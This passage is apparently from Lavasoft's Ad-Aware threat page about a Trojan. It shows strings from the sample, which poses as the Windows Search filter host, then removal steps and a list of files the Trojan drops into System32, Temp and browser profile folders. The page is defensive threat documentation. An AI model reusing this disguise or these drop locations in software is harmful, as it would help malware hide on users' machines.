d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:2748

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Windows\System32\581eb\CDClient_EX.sys (117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\tAKAXflCv.dll (35264 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\pppHBGDF.tmp (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\DAIwGxI.dll (213 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\BqwFFmwC.dll (270 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\4BFD7.txt (155 bytes)
    C:\LOG1.txt (1536 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
    C:\Windows\System32\CDCLOG.txt (428 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Client[1].dll (81472 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\System32\4BFD7.dat (4 bytes)
    C:\Windows\System32\AdN\ICZM.exe (1448729 bytes)
    C:\Windows\System32\AdN\ÅäÖÃ.txt (21 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now